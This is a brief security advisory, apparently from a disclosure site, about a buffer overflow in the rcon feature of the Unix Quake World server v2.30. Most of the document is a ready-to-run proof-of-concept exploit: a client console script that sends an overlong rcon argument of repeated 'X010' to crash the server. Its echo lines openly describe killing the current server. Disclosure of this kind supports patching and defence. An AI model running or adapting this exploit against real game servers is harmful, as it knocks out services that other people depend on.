Quake World server for Unix v2.30 contains a buffer overflow in the rcon feature that causes the server to crash with a segmentation fault. Proof of concept exploit is included below.
Credit:
The information has been provided by -kilrid .
Vulnerable systems:
Quake World server for Unix v2.30
Exploit:
//QuakeWorld RCON exploit by kilrid@berZerker.net
echo RCONEX by kilrid@berZerker.net
echo Killing current QuakeWorld Server....
echo this will most likely crash your QuakeWorld client..
wait 5
rcon 10X0110X0110X010X010X010X010X010X010X010X010 X010X010X010X010X010X010X010X010
X010X010X010X010X010X010X010X010X010X010X010 X010X010X010X010X010X010X010X010
X010X010X010X010X010X010X010X010X010X010X010 X010X010X010X010X010X010X010X010
X010X010X010X010X010X010X010X010X010X010X010 X010X010X010X010X010X010X010X010
X010X010X010X010X010X010X010X010X010X010X010 X010X010X010X010X010X010X010X010
X010X010X010X010X010X010X010X010X010X010X010 X010X010X010X010X010X010X010X010
X010X010X010X010X010X010X010X010X010X010X010 X010X010X010X010X010X010X010X010
X010X010X010X010X010X010X010X010X010X010X010 X010X010X010X010X010X010X010X010
X010X010X010X010X010X010X010X010X010X010X010 X010X010X010X010X010X010X010X010
X010X010X010X010X010X010X010X010X010X010X010 X010X010X010X010X010X010X010X010
X010X010X010X010X010X010X010X010X010X010X010 X010X010X010X010X010X010X010X010
X010X010X010X010X010X010X010X010X010X010X010 X010X010X010X010X010X010X010X010
X010X010X010X010X010X010X010X010X010X010X010 X010X010X010X010X010X010X010X010
X010X010X010X010X010X010X010X010X010X010X010 X010X010X010X010X010X010X010X010
X010X010X010X010X010X010X010X010X010X010X010 X010X010X010X010X010X010X010X010
X010X010X010X010X010X010X010X010X010X010X010 X010X010X010X010X010X010X010X010
X010X010X010X010X010X010X010X010X010X010X010 X010X010X010X010X010X010X010X010
X010X010X010X010X010X010X010X010X010X010X010 X010X010X010X010X0
(NOTE: The X010.. should be on a very long one line. It was wrapped for readability).
Please enable JavaScript to view the comments powered by Disqus.
blog comments powered by